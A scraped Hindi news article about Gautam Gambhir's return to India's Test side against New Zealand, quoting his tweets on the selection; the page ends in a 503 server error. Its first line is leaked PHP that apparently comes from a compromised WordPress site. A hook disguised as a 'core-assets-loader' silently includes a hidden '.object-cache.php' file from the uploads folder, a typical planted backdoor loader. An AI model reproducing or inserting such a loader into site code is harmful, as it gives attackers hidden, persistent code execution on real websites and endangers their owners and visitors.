add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); 2 साल बाद हुई वापसी पर बोले टीम इंडिया के ओपनर गौतम गंभीर – SOCH INDIA
Menu

खेल
2 साल बाद हुई वापसी पर बोले टीम इंडिया के ओपनर गौतम गंभीर

nobanner

2 साल बाद हुई वापसी पर बोले टीम इंडिया के ओपनर गौतम गंभीर

 

नई दिल्ली: न्यूजीलैंड के खिलाफ दूसरे टेस्ट मैच के लिए टीम इंडिया में गौतम गंभीर की दो साल बाद वापसी हो गई है. उन्हें कानपुर टेस्ट की दूसरी पारी में  दाईं हैमस्ट्रिंग से चोटिल हुए बल्लेबाज केएल राहुल (38) की जगह कोलकाता में खेले जाने वाले दूसरे टेस्ट के लिए चुना गया है. टीम में हुए सलेक्शन से खुद गौतम गंभीर भी खुश है और उन्होंने इसका इज़हार अपने सोशल मीडिया पेज पर किया.

Nothing beats playing again for d country. Test cricket, whites, red ball and India cap again. Thanks @BCCI, thanks 2 all for d prayers.

 

गंभीर ने अपने ट्विटर पर लिखा कि, ‘देश के लिए फिर से खेलने से बेहतर कुछ नहीं होता. टेस्ट क्रिकेट, सफेद ड्रेस, लाल गेंद और फिर से भारत की कैप. शुक्रिया बीसीसीआई, आप सभी का मेरे लिए दुआएं करने के लिए भी शुक्रिया.’

Excitement of a debutant, certainty of experienced, nervousness of a novice…am feeling it all. Eden here I come loaded with ambitions.

 

इसके अलावा गंभीर ने एक और ट्वीट कर कहा, ‘डेब्यू करने वाले खिलाड़ी जैसा उत्साह, अनुभवी होने का यकीन, नए की तरह बैचेनी…मैं इस वक्त ये सब महसूस कर रहा हूं. ईडेन बहुत सारी महत्वकांक्षाओं के साथ मैं आ रहा हूं.’

गौतम गंभीर ने पूरे 2 साल बाद टीम इंडिया  में वापसी की है. हाल में दलीप ट्रॉफी के दौरान गंभीर ने अपने बल्ले का दम दिखाकर चयनकर्ताओं को अपनी ओर आकर्षित किया था. गंभीर ने दलीप ट्रॉफी की पांच पारियों में 71.20 के औसत से 356 रन बनाए थे. जबकि इससे पहले 34 साल के गंभीर ने अपना आखिरी टेस्ट 2014 में इंग्लैंड के खिलाफ खेला था जहां चार पारियों में वो महज 25 रन बनाने में कामयाब हो पाए थे.

न्यूज़ीलैंड के खिलाफ 30 तारीख से शुरू होने वाले दूसरे टेस्ट मैच के लिए टीम में दो बदलाव किए गए हैं. चोटिल सलामी बल्लेबाज के एल राहुल और चिकनगुनिया के कारण पहले टेस्ट से बाहर होने वाले तेज गेंदबाज इशांत शर्मा को टीम से बाहर कर दिया गया है. जबकि इनकी जगह गौतम गंभीर और हरियाण के ऑफ स्पिनर जयंत यादव को टीम में जगह मिली है. गंभीर अगले दोनों टेस्ट में टीम के साथ रहेंगे जबकि जयंत को कोलकाता टेस्ट के लिए टीम में जगह मिली है.

कानपुर टेस्ट की दूसरी पारी में बल्लेबाजी के दौरान केएल राहुल (38) की दाईं हैमस्ट्रिंग में खिंचाव आ गया था जिससी वजह से वो फील्डिंग भी नहीं कर पाए थे. गंभीर ने हाल ही खत्म हुए पिंक बॉल टेस्ट में टलीप ट्रॉपी में शानदार प्रदर्शन कर टीम में जगह बनाने के लिए दस्तक दी थी.

टीम के कोच अनिल कुंबले गंभीर को टीम में जगह देने के मूड में थे और उन्होंने ही गंभीर का नाम आगे बढ़ाया था. गंभीर ने बैंगलोर के NCA में अपना फिटनेस टेस्ट भी दे दिया था.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.